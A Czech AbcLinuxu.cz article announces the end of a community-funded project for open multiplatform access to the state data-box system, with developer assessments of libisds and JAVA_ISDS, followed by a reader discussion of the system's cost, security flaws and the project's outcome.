abclinuxu.cz AbcLinuxu.cz itbiz.cz ITBiz.cz HDmag.cz HDmag.cz abcprace.cz AbcPráce.cz
Inzerujte na AbcPráce.cz od 950 Kč
Rozšířené hledání
×
    včera 17:33 | Nová verze

    Canonical vydal (email, blog, YouTube) Ubuntu 24.04 LTS Noble Numbat. Přehled novinek v poznámkách k vydání a také příspěvcích na blogu: novinky v desktopu a novinky v bezpečnosti. Vydány byly také oficiální deriváty Edubuntu, Kubuntu, Lubuntu, Ubuntu Budgie, Ubuntu Cinnamon, Ubuntu Kylin, Ubuntu MATE, Ubuntu Studio, Ubuntu Unity a Xubuntu. Jedná se o 10. LTS verzi.

    Ladislav Hagara | Komentářů: 4
    včera 14:22 | Komunita

    Na YouTube je k dispozici videozáznam z včerejšího Czech Open Source Policy Forum 2024.

    Ladislav Hagara | Komentářů: 1
    včera 13:22 | Nová verze

    Fossil (Wikipedie) byl vydán ve verzi 2.24. Jedná se o distribuovaný systém správy verzí propojený se správou chyb, wiki stránek a blogů s integrovaným webovým rozhraním. Vše běží z jednoho jediného spustitelného souboru a uloženo je v SQLite databázi.

    Ladislav Hagara | Komentářů: 0
    včera 12:44 | Nová verze

    Byla vydána nová stabilní verze 6.7 webového prohlížeče Vivaldi (Wikipedie). Postavena je na Chromiu 124. Přehled novinek i s náhledy v příspěvku na blogu. Vypíchnout lze Spořič paměti (Memory Saver) automaticky hibernující karty, které nebyly nějakou dobu používány nebo vylepšené Odběry (Feed Reader).

    Ladislav Hagara | Komentářů: 0
    včera 04:55 | Nová verze

    OpenJS Foundation, oficiální projekt konsorcia Linux Foundation, oznámila vydání verze 22 otevřeného multiplatformního prostředí pro vývoj a běh síťových aplikací napsaných v JavaScriptu Node.js (Wikipedie). V říjnu se verze 22 stane novou aktivní LTS verzí. Podpora je plánována do dubna 2027.

    Ladislav Hagara | Komentářů: 0
    včera 04:22 | Nová verze

    Byla vydána verze 8.2 open source virtualizační platformy Proxmox VE (Proxmox Virtual Environment, Wikipedie) založené na Debianu. Přehled novinek v poznámkách k vydání a v informačním videu. Zdůrazněn je průvodce migrací hostů z VMware ESXi do Proxmoxu.

    Ladislav Hagara | Komentářů: 0
    včera 04:11 | Nová verze

    R (Wikipedie), programovací jazyk a prostředí určené pro statistickou analýzu dat a jejich grafické zobrazení, bylo vydáno ve verzi 4.4.0. Její kódové jméno je Puppy Cup.

    Ladislav Hagara | Komentářů: 0
    24.4. 22:44 | IT novinky

    IBM kupuje společnost HashiCorp (Terraform, Packer, Vault, Boundary, Consul, Nomad, Waypoint, Vagrant, …) za 6,4 miliardy dolarů, tj. 35 dolarů za akcii.

    Ladislav Hagara | Komentářů: 12
    24.4. 15:55 | Nová verze

    Byl vydán TrueNAS SCALE 24.04 “Dragonfish”. Přehled novinek této open source storage platformy postavené na Debianu v poznámkách k vydání.

    Ladislav Hagara | Komentářů: 0
    24.4. 13:44 | IT novinky

    Oznámeny byly nové Raspberry Pi Compute Module 4S. Vedle původní 1 GB varianty jsou nově k dispozici také varianty s 2 GB, 4 GB a 8 GB paměti. Compute Modules 4S mají na rozdíl od Compute Module 4 tvar a velikost Compute Module 3+ a předchozích. Lze tak provést snadný upgrade.

    Ladislav Hagara | Komentářů: 0
    KDE Plasma 6
     (73%)
     (9%)
     (2%)
     (16%)
    Celkem 765 hlasů
     Komentářů: 4, poslední 6.4. 15:51
    Rozcestník

    Uzavření projektu Multiplatformní přístup pro datové schránky

    3. 2. 2011 | Redakce | Různé | 7642×

    V roce 2009 byl na AbcLinuxu zahájen projekt vývoje otevřených multiplatformních řešení pro přístup k datovým schránkám.

    Projekt si zpočátku kladl ambiciózní cíle. Ačkoliv se v rámci tohoto projektu nepodařilo všech vytyčených cílů dosáhnout, podařilo se zviditelnit nedostatky ne zcela ideální implementace samotných Datových schránek a nabídnout použitelné řešení pro ty z nás, kteří nemohou používat oficiální webové rozhraní pro přístup k Datovým schránkám. Zároveň jsme rádi, že mimo projektů probíhajících v rámci AbcLinuxu, se vynořila řada dalších dobrých implementací.

    Protože aktivita kolem samotného projektu utichla a naopak rostl tlak na závěrečný verdikt, bylo nutné najít způsob, jakým peníze rozdělit mezi přihlášené projekty. Po posouzení jsme došli k závěru, že peníze budou rozděleny mezi projekty libisds (knihovna v C a frontend Šigofumi) a JAVA_ISDS (implementace v Javě), a to v poměru půl na půl. Uvědomujeme si, že žádný způsob rozdělení peněz není úplně fér ke všem stranám zároveň: tedy přihlášeným i nepřihlášeným projektům, projektům, které mezitím vznikly pod záštitou nejrůznějších firem a sdružení a v podstatě ani k lidem a firmám, které na vývoj přispěly.

    Díky tedy patří i ostatním projektům jako dsgui (CZ.NIC, z.s.p.o.), OpenDS.cz (blue.point Solutions, s.r.o.), datové schránky pro Android (APK SOFT s.r.o.) a řadě dalších.

    Výše příspěvků a celou historii bankovního účtu, kde byly v rukou Liberix, o.p.s. spravovány finance, lze vidět na transparentním kontě (přehled v PDF). Peníze tedy byly rozděleny následovně:

    • libisds: 34 810 Kč
    • JAVA_ISDS: 34 810 Kč

    Zhodnocení

    Před rokem jsme zveřejnili stav obou projektů. Požádali jsme oba projekty o dodatečné zhodnocení – jedno zhodnocení, které jsme dostali, je krátké (za JAVA_ISDS) a jedno je velmi dlouhé (za libisds). Bylo nám líto to dlouhé zkracovat, proto jej najdete v celém znění na druhé stránce tohoto článku. Cílem bylo čtenáře seznámit s tím, co se v projektu událo a jaký je jejich postoj k datovým schránkám.

    Chtěli bychom poděkovat všem vývojářům, kteří umožnili uživatelům přistupovat k Datovým schránkám z libovolného operačního systému, což pro mnohé nepředstavuje jen „funkci navíc“, ale také v podstatě zákonnou nezbytnost. Dále chceme poděkovat sdružení Liberix, o.p.s. za důležitou spolupráci a pomoc v průběhu projektu. Děkujeme všem, kteří finančně přispěli, ale také těm, kteří nějakým způsobem pomohli při testování a rozvoji všech otevřených řešení. A na závěr přejeme těm, kterých se to týká, šťastnější ruku při volbě a implementaci technologií, které se přímo dotýkají občanů této země.

    JAVA_ISDS (Václav Rosecký)

    Nedávno jsem přidal přihlašování i přes certifikát. Vyřízení osobního certifikátu od Postsignum bylo docela vtipné, krátce po jeho vydání mi volali s prosbou, abych se tam stavil, protože mi zapomněli dát podepsat souhlas se zpracovanim osobnich udajů...

    Připravuji se na přechod na nové testovací prostředí, které bude spuštěno v únoru.

    O Datových schránkách nemám kladné mínění, ale některé změny jsem uvítal s radostí: přechod na BASIC autentizaci místo původního řešení s cookies a několikanásobným přesměrováním. Člověk se také naučí defenzivnímu programování, protože ví, že se nemůže na nic spoléhat.

    libisds (Petr Písař)

    Knihovna není zcela hotová. Seznam věcí, které bych rád jednou začlenil, je zapsán v souboru TODO.

    Především se jedná o podporu souběžného zpracování z více vláken, možnost při překladu vypnout podporu síťových funkcí, schopnost validovat požadavky a odpovědi serveru proti XML schématu a to nejdůležitější – dopsat testy pro síťové operace.

    Testováním síťových operací myslím testy funkcí jako přihlášení k datové schránce, získání seznamu zpráv, odeslání zprávy atd. V současnosti existuje testovací instance ISDS, kde je možné takové operace vyzkoušet, ale vše s patřičnou časovou prodlevou a především není možné otestovat reakci knihovny na všechny chybové stavy nebo na chybně utvořené zprávy (například hodnota času doručení by nebyla správně utvořena.).

    Co tedy chybí, je nástroj, který by simuloval server, a sada testů, které by prověřily knihovnu po všech stránkách, především v okrajových případech, které se za běžného provozu nevyskytují. Protože takovou péči by si zasloužily i jiné knihovny (napsané v rozličných jazycích) a protože simulátor testů a definice testů mohou být na konkrétní knihovně nezávislé, došel jsem k závěru, že je třeba věc uchopit značně abstraktně a na jazyku knihovny nezávisle. Protože se jedná v podstatě o samostatný projekt rozsahem srovnatelný se samotnou knihovnou, rozhodl jsem se, že jej prostřednictvím firmy Red Hat Czech s. r. o. nabídnu jako zadání bakalářské práce. Pokud bude téma akademicky průchodné a až budou všechny formality hotové, studenti Fakulty informatiky Masarykovy univerzity a Fakulty informačních technologií Vysokého učení technického v Brně dostanou příležitost, jak skloubit příjemné s užitečným.

           

    Hodnocení: 100 %

            špatnédobré        

    Nástroje: Tisk bez diskuse

    Tiskni Sdílej: Linkuj Jaggni to Vybrali.sme.sk Google Del.icio.us Facebook

    Komentáře

    Vložit další komentář

    3.2.2011 01:59 www
    Rozbalit Rozbalit vše Re: Uzavření projektu Multiplatformní přístup pro datové schránky
    Petr Písař a libisds mají muj obdiv. Přál bych jim větší odměnu, 30k neni špatný, ale muselo s tim bejt strašně práce.
    Saljack avatar 3.2.2011 08:27 Saljack | skóre: 28 | blog: Saljack | Praha
    Rozbalit Rozbalit vše Re: Uzavření projektu Multiplatformní přístup pro datové schránky
    Koukám, že ty datové schránky nejsou zrovna bezpečné. Tu chybu s tím, že můžeš zjistit něco o zprávě, která ti nepatří by měli opravit. Tohle obrovská chyba, která by se u takového projektu objevit prostě neměla.
    Sex, Drugs & Rock´n Roll.
    3.2.2011 13:25 trekker.dk | skóre: 72
    Rozbalit Rozbalit vše Re: Uzavření projektu Multiplatformní přístup pro datové schránky
    Koukám, že ty datové schránky nejsou zrovna bezpečné.
    Dobré ránko
    Quando omni flunkus moritati
    Jendа avatar 3.2.2011 18:03 Jendа | skóre: 78 | blog: Jenda | JO70FB
    Rozbalit Rozbalit vše Re: Uzavření projektu Multiplatformní přístup pro datové schránky
    Koukám, že ty datové schránky nejsou zrovna bezpečné.
    <uvítací melodie Windows XP>
    Tu chybu s tím, že můžeš zjistit něco o zprávě, která ti nepatří by měli opravit.
    Jsou tam i horší věci.
    Jendа avatar 3.2.2011 19:17 Jendа | skóre: 78 | blog: Jenda | JO70FB
    Rozbalit Rozbalit vše Re: Uzavření projektu Multiplatformní přístup pro datové schránky
    Tak jsem si stáhl poslední 602XML Filler a chyba nahlášená 15. 1. 2010 stále trvá.
    Luk avatar 4.2.2011 15:41 Luk | skóre: 47 | blog: Kacířské myšlenky | Kutná Hora
    Rozbalit Rozbalit vše Re: Uzavření projektu Multiplatformní přístup pro datové schránky
    No a cos čekal? :-D
    Šifrování je absolutní nutnost a pomáhá chránit před nekalými živly
    Jendа avatar 4.2.2011 16:38 Jendа | skóre: 78 | blog: Jenda | JO70FB
    Rozbalit Rozbalit vše Re: Uzavření projektu Multiplatformní přístup pro datové schránky
    No jsem přihlášen v konferenci debian-security, takže jsem si zvykl na to, že privilege escalation je považováno za kritikou chybu, která se opraví tak nejvýš do jednoho dne. Obzvláště když k její opravě stačí jeden chown.
    Luk avatar 4.2.2011 18:19 Luk | skóre: 47 | blog: Kacířské myšlenky | Kutná Hora
    Rozbalit Rozbalit vše Re: Uzavření projektu Multiplatformní přístup pro datové schránky
    Měl by ses vráti nohama na zem, do Česka. Do země, kde se ústavní práva považují za zbytečnou překážku při vyšetřování drobných dopravních přestupků, kde se veřejné zakázky zadávají nejdražší nabídce (a při prodeji majetku se naopak prodává nabídce nejnižší), kde patří k bontonu chodit na večírky s milionem v kapse a kde ... nějaké kritické chyby nikoho netrápí.
    Šifrování je absolutní nutnost a pomáhá chránit před nekalými živly
    3.2.2011 08:33 s0 | skóre: 32 | blog: nejchytřejší kecy | prágl
    Rozbalit Rozbalit vše Re: Uzavření projektu Multiplatformní přístup pro datové schránky
    Petře Písaři, klobouk dolů!
    Kuolema Kaikille (Paitsi Meille).
    belisarivs avatar 3.2.2011 09:13 belisarivs | skóre: 22 | blog: Psychobláboly
    Rozbalit Rozbalit vše Re: Uzavření projektu Multiplatformní přístup pro datové schránky
    Souhlas. Je to borec.
    IRC is just multiplayer notepad.
    3.2.2011 10:57 Ladislav Nešněra | skóre: 30 | blog: ..+2
    Rozbalit Rozbalit vše Re: Uzavření projektu Multiplatformní přístup pro datové schránky
    ..takhle jsem se už dlouho nezasmál. A zasmál bych se ještě víc, kdyby tu někdo přihodil informaci, na kolik že tato taškařice přišla daňového poplatníka.. (Hlavně by mě zajímala ta proklamovaná "úspora" oproti obálkám s modrým pruhem) :-D
    3.2.2011 11:21 fri
    Rozbalit Rozbalit vše Re: Uzavření projektu Multiplatformní přístup pro datové schránky
    nemám představu, ale zaznamenal jsem názor zkušenějších, že je to prostě "černá díra" vysávající finanční prostředky, kterou nikde jinde v okolních státech nemají; možná něco na ten způsob zkusili ve Švédsku (možná ne), ale brzy od toho pro ty náklady ustoupili.
    3.2.2011 11:51 kkaarreell | skóre: 6 | blog: perkele
    Rozbalit Rozbalit vše Re: Uzavření projektu Multiplatformní přístup pro datové schránky
    Rekl bych ze zadna, posta cenu za datovou zpravu zvolila tak, aby si tim nahradila usly zisk.
    3.2.2011 13:02 Ladislav Nešněra | skóre: 30 | blog: ..+2
    Rozbalit Rozbalit vše Re: Uzavření projektu Multiplatformní přístup pro datové schránky
    To si nemyslím. Z toho, co vím, datovkou chodí i věci, které by se jinak posílaly běžnou korespondencí. Asi by stačilo porovnat objem pošty z které vycházela ta kalkulace a datové zprávy orgánů veřejné moci.

    Celkem neúspěšně jsem zkoušel najít nějaká čísla, ale narazil jsem i na vtipnou kalkulačku. Moc se mi líbí ta nulová cena..

    Jendа avatar 3.2.2011 18:19 Jendа | skóre: 78 | blog: Jenda | JO70FB
    Rozbalit Rozbalit vše Re: Uzavření projektu Multiplatformní přístup pro datové schránky
    Celkem neúspěšně jsem zkoušel najít nějaká čísla
    Pokud by například Seznam doručoval e-maily za podobnou cenu, jako ISDS doručuje zprávy, začal by být v České republice citelný nedostatek peněz :-).
    ale narazil jsem i na vtipnou kalkulačku
    To mi připomíná kalkulačku DP, která v případě dopravy metrem počítá čas z nástupiště na nástupiště…
    4.2.2011 08:41 kkaarreell | skóre: 6 | blog: perkele
    Rozbalit Rozbalit vše Re: Uzavření projektu Multiplatformní přístup pro datové schránky
    No, datova zprava vyjde stat asi na 16 Kc (o 10 Kc mene nez doporuceny dopis), system stal temer miliardu. Jelikoz datovou zpravu nemusi posta nikde vybirat, tridit, prevazet, ani dorucovat, tak si nemyslim, ze by na tom prilis tratila. Na druhou stranu by me zajimalo, kolik asi tak muze stat provozovani email hostingu s digitalnim podpisem. A at si posta tvrdi co chce, o nic vic se prakticky nejedna (obyc. email hosting by byl vlastne jednodussi a fungoval napric platformami).
    4.2.2011 09:47 frr | skóre: 34
    Rozbalit Rozbalit vše Re: Uzavření projektu Multiplatformní přístup pro datové schránky
    +1 Aneb k čemu vynalézat kolo. Standardní a multiplatformní prostředky pro transport zpráv jsou široce dostupné, dokonce i v provedení pro masové nasazení.

    Ach jo. Oni to zřejmě nejsou jenom datové schránky. Nedávno nám při dovozu nějaké drobnosti DHL nutilo JSD ve formátu XML, že jim to takhle posílá česká Celní správa. A ať si to archivujem a že nám to takhle musí stačit. A naše účetní se stavěla na zadní, že pro pár konkrétních účelů ten doklad potřebuje na papíře. Ona sice existuje nějaká komerční+placená aplikace pro celní deklaranty (možná ne jedna), která to umí otevřít a interpretovat=vytisknout na papír nebo do PDF, a v DHL ji i mají interně k dispozici, ale rozumím tomu tak, že ji nemají zapřaženou do standardního workflow (protože je stand-alone klikací) = interní provozní systém mají shůry daný z centrály v USA a ručně provádět export českých XML JSD do PDF nehodlají (při tom objemu zásilek to nejde). Takže prostě forwardujou XML attachment od celní správy svým koncákům. To si kvůli nedohodě DHL s českým státem máme koupit složitý software, který ani z 1% nevyužijeme? Že jsem trochu od fochu, zkoušel jsem browsit, jestli k tomu najdu aspoň náznak DTD, XSL nebo aspoň nějaké dokumentace. Ani náhodou. Ten XML soubor vůbec neobsahuje v hlavičce odkaz na relevantní DTD... a spousta tagů uvnitř obsahuje nějaké číselné kódy, ke kterým tímto neexistuje popis významu. No aspoň že z toho jde pochopit jakási částka a měna - ale můžu se jenom domnívat, že si význam tagů myslím správně. XML v tomhle pojetí, to je taková hra na otevřenost... (Zkoušeli jsme se v DHL na někoho dotelefonovat, i jsme po telefonu vynadali pár lidem, kteří zněli trochu relevantně, tj. z babosedu/callcentra nás kamsi přepojili, ale zjevně jsme neťali do živého :-)
    [:wq]
    Luboš Doležel (Doli) avatar 3.2.2011 13:39 Luboš Doležel (Doli) | skóre: 98 | blog: Doliho blog | Kladensko
    Rozbalit Rozbalit vše Re: Uzavření projektu Multiplatformní přístup pro datové schránky
    A až tak se to nevyplatí ani firmám používat k posílání pošty mezi sebou. Kdyby ta zpráva stála 5 Kč, tak by to šlo, ale takhle je to víc problémů než užitku.
    3.2.2011 22:18 Michal Kubeček | skóre: 72 | Luštěnice
    Rozbalit Rozbalit vše Re: Uzavření projektu Multiplatformní přístup pro datové schránky
    Kdyby stála pět korun, byla by levnější než doporučený dopis a Česká pošta by na tom tratila. Nebo by si aspoň myslela, že na tom tratí.
    3.2.2011 13:31 trekker.dk | skóre: 72
    Rozbalit Rozbalit vše Re: Uzavření projektu Multiplatformní přístup pro datové schránky
    A zasmál bych se ještě víc, kdyby tu někdo přihodil informaci, na kolik že tato taškařice přišla daňového poplatníka..
    Pokud si dobře vzpomínám, slyšel jsem něco o 800MKč. Jestli je v tom i provoz, nebo je to vyloženě za zhotovení, to si nepamatuju.
    Quando omni flunkus moritati
    Jendа avatar 3.2.2011 18:15 Jendа | skóre: 78 | blog: Jenda | JO70FB
    Rozbalit Rozbalit vše Re: Uzavření projektu Multiplatformní přístup pro datové schránky
    A zasmál bych se ještě víc, kdyby tu někdo přihodil informaci, na kolik že tato taškařice přišla daňového poplatníka..
    9×108 Kč.
    3.2.2011 22:06 d.c. | skóre: 30
    Rozbalit Rozbalit vše Re: Uzavření projektu Multiplatformní přístup pro datové schránky
    Bohuzel, neni to vse.
    3.2.2011 08:45 Aleš Kapica | skóre: 51 | blog: kenyho_stesky | Ostrava
    Rozbalit Rozbalit vše Re: Uzavření projektu Multiplatformní přístup pro datové schránky
    Ty jo. Neměl jsem sílu to dočíst. Neexistuje pádnější doklad diletantského přístupu ze strany státu k IT, jako právě tento popis stavu projektu od p. Písaře.
    Jiří Svoboda avatar 3.2.2011 09:04 Jiří Svoboda | skóre: 37 | blog: cat /dev/mind | Prostějov
    Rozbalit Rozbalit vše Re: Uzavření projektu Multiplatformní přístup pro datové schránky
    A proč z toho viním programátory ze Slušovic?
    Svazarmovská badna Software602 je pražská. Nebo snad opravdu mají někoho ve Slušovicích? Nedošlo k záměně s SWS?.
    3.2.2011 14:43 Senior Database Programmer
    Rozbalit Rozbalit vše Re: Uzavření projektu Multiplatformní přístup pro datové schránky
    Primárně chceme vyvinout samostatnou jednoúčelovou GUI aplikaci a rozšíření Thunderbirdu.

    Takže výsledok je fiasko, presne ako som predpovedal. Ak si dobre pamätám tak cieľom mala byť GUI aplikácia, konkrétne nadstavba nad Thunderbird a knižnice na prístup k schránkam mal byť len medzikrok.

    Knižnicu ako user vobec nemozem pouzivat, nedal by som im ani korunu!
    3.2.2011 15:19 trekker.dk | skóre: 72
    Rozbalit Rozbalit vše Re: Uzavření projektu Multiplatformní přístup pro datové schránky
    Nejlepší jsou lidi, co ze svého nedají ani korunu, ale mají pocit, že někdo bude brát vážně jejich poznámky o tom, jak koho za co odměňovat.
    Quando omni flunkus moritati
    3.2.2011 16:01 Senior Database Programmer
    Rozbalit Rozbalit vše Re: Uzavření projektu Multiplatformní přístup pro datové schránky
    Ten výkrik na konci bol len sranda, prečo reaguješ zrovna na to a nie na zvyšok?

    Ak by som bol vyhlasovateľ tejto súťaže asi by som rozmýšlal, že knihovny odmením podľa plánu (12 a 10 tisíc Kč) a zvyšok financii vrátim darcom, pretože projekt nebol dokončený a ostal vo Fáze 1.
    3.2.2011 15:25 Filip Jirsák | skóre: 68 | blog: Fa & Bi
    Rozbalit Rozbalit vše Re: Uzavření projektu Multiplatformní přístup pro datové schránky
    Pamatujete si špatně.

    Jako uživatel byste spíš měl používat frontend té knihovny (v článku je také zmíněn).
    3.2.2011 15:47 Senior Database Programmer
    Rozbalit Rozbalit vše Re: Uzavření projektu Multiplatformní přístup pro datové schránky
    Veď som citoval z článku zadania, takže si to pamätám dobre:

    Primárně chceme vyvinout samostatnou jednoúčelovou GUI aplikaci a rozšíření Thunderbirdu.

    v zadani bolo:

    Cílem je vytvoření funkčního GUI rozhraní, které uživateli umožní provádět níže uvedené funkčnosti:

    Aj odmeny boli nastavené tak, že najväčšie boli za GUI aplikáciu a plugin do Thunderbirda takže ma nepresvedčujte o opaku :-) Knižnice bola iba Fáza 1. Veď to všetko máte v tom wiki projektu.

    Treba si chlapsky priznať, že to je fiasko. Komunita nefunguje a za 60 litrov by to pravdepodobne zbúchala komerčná firma presne podla zadania, v kratšom čase a výsledok by bol funkčná aplikácia.

    Koľko ludí použije tie knižnice? Všetky ostatné aplikácie na prácu so schránkamy používajú vlastné. Možno ešte vzniknu nejaké nové projekty na prístup ku schránkam a použijú tieto vaše hotové knižnice ale koľko ich bude? Jeden alebo dva? Hotový plugin do Thunderbirdu by IMHO bol najpoužívanejší plugin do TB v ČR! Bohužial, projekt ostal vo fáze 1.

    Ten frontend v clanku je command line, cielom bolo GUI alebo TB rozsirenie!
    Luboš Doležel (Doli) avatar 3.2.2011 15:56 Luboš Doležel (Doli) | skóre: 98 | blog: Doliho blog | Kladensko
    Rozbalit Rozbalit vše Re: Uzavření projektu Multiplatformní přístup pro datové schránky
    Není to fiasko, mimo tento projekt vzniklo několik dalších projektů, na jejichž konci je i GUI klient. Podstatné je, že pokud nyní bude jakákoliv firma nebo jedinec chtít zaintegrovat DS do svého produktu, mají komunikační práci hotovou, a to je hodně. Výstupem jiných projektů podobně schopné knihovny, pokud vím, nebyly. Navíc v článku zmiňovaný klient pro Android tuším staví právě na JAVA_ISDS.

    Na TB rozšíření se nikdo nenašel, což při pohledu na složitost programování čehokoliv pro Mozillí produkty ani není divu.
    3.2.2011 16:10 Senior Database Programmer
    Rozbalit Rozbalit vše Re: Uzavření projektu Multiplatformní přístup pro datové schránky
    No veď presne to som napísal. Hotové knižnice použije pár nových projektov (1 alebo 2, moc ich už asi nevznikne) a to je všetko.

    Obyčajný uživateľ má smolu a z jeho pohľadu najužitočnejšou časťou projektu je wiki text kde sú vymenované iné aplikácie na pristúp do DS, pretože tie môže použiť.

    Ad zložitosť TB: Nemusel to byť len plugin do TB ale v zadaní bolo aj ľubovolná iná multiplatformná GUI aplikácia (Java, QT, GTK). Aplikácia nevznikla žiadna (command line utilitku nepočítam, to nieje GUI), projekt ostal vo fázi 1 :-/
    3.2.2011 17:57 Senior Database Programmer
    Rozbalit Rozbalit vše Re: Uzavření projektu Multiplatformní přístup pro datové schránky
    Ad zložitost TB rozširírenia: Tu niekto v diskusii tvrdí že to je malina.

    Mozilla má obecně jednu z nejlépe dokumnetovaných podpor rozšíření.
    3.2.2011 17:18 Filip Jirsák | skóre: 68 | blog: Fa & Bi
    Rozbalit Rozbalit vše Re: Uzavření projektu Multiplatformní přístup pro datové schránky
    Mezi „GUI aplikace a/nebo rozšíření Thunderbirdu“ a „rozšíření Thunderbirdu“ (co si pamatujete vy) je rozdíl.

    Knihovny jsou podstatná část toho projektu – ostatně na jejich základě už vznikly minimálně dva frontendy. Mít GUI, které by ale nic nedělalo, by bylo horší.

    „Komunita nefunguje“ svědčí akorát o tom, že netušíte, co je to komunita. Vaše představa, že komunita je něco, do čeho hodíte zadání a ono vám to vyplivne výsledek, je mimo.
    za 60 litrov by to pravdepodobne zbúchala komerčná firma presne podla zadania, v kratšom čase a výsledok by bol funkčná aplikácia.
    Výsledek by byla aplikace nyní už zase nefunkční, protože od zadání se některé věci dost podstatně změnily. Takže byste vzal dalších 60 tisíc a dal je další firmě, aby to napsala znova podle nového zadání. A nebo tady máte opensource projekt, který není závislý na původním autorovi a může na něm pokračovat každý.
    3.2.2011 17:53 Senior Database Programmer
    Rozbalit Rozbalit vše Re: Uzavření projektu Multiplatformní přístup pro datové schránky
    Rád by som poznal názor Leoša Literáka (on bol pôvodný zadavateľ nie?) či výsledok zastavenie projektu vo fázi 1 považuje za úspech.

    LOL
    11.2.2011 09:06 FrantaS | skóre: 12 | Hlučín
    Rozbalit Rozbalit vše Re: Uzavření projektu Multiplatformní přístup pro datové schránky
    To: Senior Database Programmer

    Vážený pane,

    řeknu to velmi, ale opravdu velmi velmi slušně:

    Váše názory opravdu opravdu velmi nesdílím.
    Ať se nám daří.
    3.2.2011 17:59 trekker.dk | skóre: 72
    Rozbalit Rozbalit vše Re: Uzavření projektu Multiplatformní přístup pro datové schránky
    Výsledek by byla aplikace nyní už zase nefunkční, protože od zadání se některé věci dost podstatně změnily. Takže byste vzal dalších 60 tisíc a dal je další firmě, aby to napsala znova podle nového zadání.
    Ona je sporná i platnost tvrzení, že by to firma zbouchala za šedesát tisíc... tak nějak mi to přijde kapku málo.
    Quando omni flunkus moritati
    4.2.2011 15:20 moira | skóre: 30 | blog: nesmysly
    Rozbalit Rozbalit vše Re: Uzavření projektu Multiplatformní přístup pro datové schránky
    +1
    Překladač ti nikdy neřekne: "budeme kamarádi"
    3.2.2011 19:11 jehovista
    Rozbalit Rozbalit vše Re: Uzavření projektu Multiplatformní přístup pro datové schránky
    "za 60 litrov by to pravdepodobne zbúchala komerčná firma" Za 60 litru se s tebou komercni firma ani nebude bavit. To jsou jenom mesicni naklady na programatora.
    multi avatar 4.2.2011 09:03 multi | skóre: 38 | blog: JaNejsemOdsut
    Rozbalit Rozbalit vše Re: Uzavření projektu Multiplatformní přístup pro datové schránky
    za 60 litrov by to pravdepodobne zbúchala komerčná firma presne podla zadania, v kratšom čase a výsledok by bol funkčná aplikácia.
    Tak todle me neda se nevyjadrit! Zakolik ze to nezvladla na firma 602, ktera je komercni ? Ani tu multiplatformni knihovnu neudelala!
    4.2.2011 16:12 imploder | skóre: 11
    Rozbalit Rozbalit vše Re: Uzavření projektu Multiplatformní přístup pro datové schránky
    +1

    Inu, zlaté české ručičky.

    Jak se u nás k takovým zakázkám přistupuje ilustruje i "červené tlačítko", za jehož naprogramování vyhodil stát jen tak pár set tisíc (je to jedno tlačítko jako doplněk na panel IE, při kliknutí současné URL a několik URL z historie). Myslím, že DS jsou něco podobného, akorát ve velkém.
    3.2.2011 15:07 User682 | skóre: 38 | blog: aqarium | Praha
    Rozbalit Rozbalit vše Re: Uzavření projektu Multiplatformní přístup pro datové schránky
    zdravim,

    projekt ukazal jednu velmi dobrou zkusenost do budoucna. Ze firmy a lidi jsou ochotni za vyvoj aplikaci pro Linux platit. Ted neresim licence a otevrenost zdroju. Takze diky za proslapani cesty.

    Kdybych sel do neceho podobneho, tak 1/4-1/3 ceny padne urcite na analytika a nekoho, kdo to bude ridit.

    Cekal jsem tedy o neco vice na vybranych penezich, kdyz bylo subjektu, co prispeli tolik. Minuly rok jsem investoval do obsahu asi 60kKc ze sveho....

    gf
    3.2.2011 16:43 karel
    Rozbalit Rozbalit vše Re: Uzavření projektu Multiplatformní přístup pro datové schránky
    ja ted vidim pravej opak.... poradny prachy nedal nikdo.....
    5.2.2011 12:32 Mintaka
    Rozbalit Rozbalit vše Re: Uzavření projektu Multiplatformní přístup pro datové schránky
    Také se ukázalo, že v naší malé České kotlině je několik skupin, kterým stojí za to, hrát si na svém písečku místo aby se spojili. Škoda, že jsme programátorům nevytvořili zázemí uživatelů a testerů, kteří by jim viseli na klávesnici a vrhali se na každý nový release.

    Za dobré považuji, že vůbec byla chuť a vůle do takového projektu jít a že se to podařilo dovést tam kde to je.

    Snad se dostatečně ukázalo, že když to bude opravdu třeba, najde se pár blanických, kteří vylezou a věnují kousek svého života druhým.

    3.2.2011 17:18 frr | skóre: 34
    Rozbalit Rozbalit vše Re: Uzavření projektu Multiplatformní přístup pro datové schránky
    Pokud odhlédnu od "aspektu daňového poplatníka", tak mám trochu déja vu: programovat čistou implementaci protikusu k nějakému proprietárnímu programu, který si snad ani neklade za cíl mít dobrý interní návrh a čisté/stabilní/standardní vnější rozhraní... to už jsem taky jednou zkusil. Zůstal mi tehdy dost tělesný pocit únavy a marnosti. Pan Písař má můj hluboký obdiv.
    [:wq]
    3.2.2011 17:23 frr | skóre: 34
    Rozbalit Rozbalit vše Re: Uzavření projektu Multiplatformní přístup pro datové schránky
    BTW, napsat server pro potřeby testování klientské knihovny: => v optimálním případě by vznikla alternativní open-source implementace serverové strany "datových schránek" :-D
    [:wq]
    multi avatar 4.2.2011 09:05 multi | skóre: 38 | blog: JaNejsemOdsut
    Rozbalit Rozbalit vše Re: Uzavření projektu Multiplatformní přístup pro datové schránky
    Mintaka avatar 5.2.2011 14:47 Mintaka | skóre: 13
    Rozbalit Rozbalit vše Re: Uzavření projektu Multiplatformní přístup pro datové schránky
    A což rovnou nabídnout vládě ČR OpenSource alternativu ISDS serveru jako kandidáta na přebrání ostrého provozu?

    Česká pošta by dostala na prdel. Možná by ji to zahubilo, nebo by se zamysleli a začali dělat věci lépe.
    5.2.2011 15:57 frr | skóre: 34
    Rozbalit Rozbalit vše Re: Uzavření projektu Multiplatformní přístup pro datové schránky

    Ano, přesně tímto směrem jsem vtipkoval. Vtipkoval, protože

    1. To by nejdřív v našem politickém vedení musela existovat politická vůle řešit věci otevřeně, transparentně a elegantně
    2. nebylo by třeba programovat zgruntu nového kočkopsa, ale jak výše navrhuje kkaarreell, dalo by se to postavit v maximální míře na zavedených a standardních technologiích pro doručování/čtení/archivaci zpráv
    3. I takové "otevřené" řešení by musel někdo vymyslet, postavit, nainstalovat, v okrajových aspektech programátorsky dointegrovat, a taky provozovat. Postavit to a hotovou provozuschopnou věc ukázat vládě, to je scifi - protože přinejmenším infrastruktura pro takový cluster něco stojí. Takže je opět na výběr zadat to nějaké firmě (třeba některému stávajícímu freemailu), nebo to případně provozovat vlastními silami nějakou státní organizační složkou.

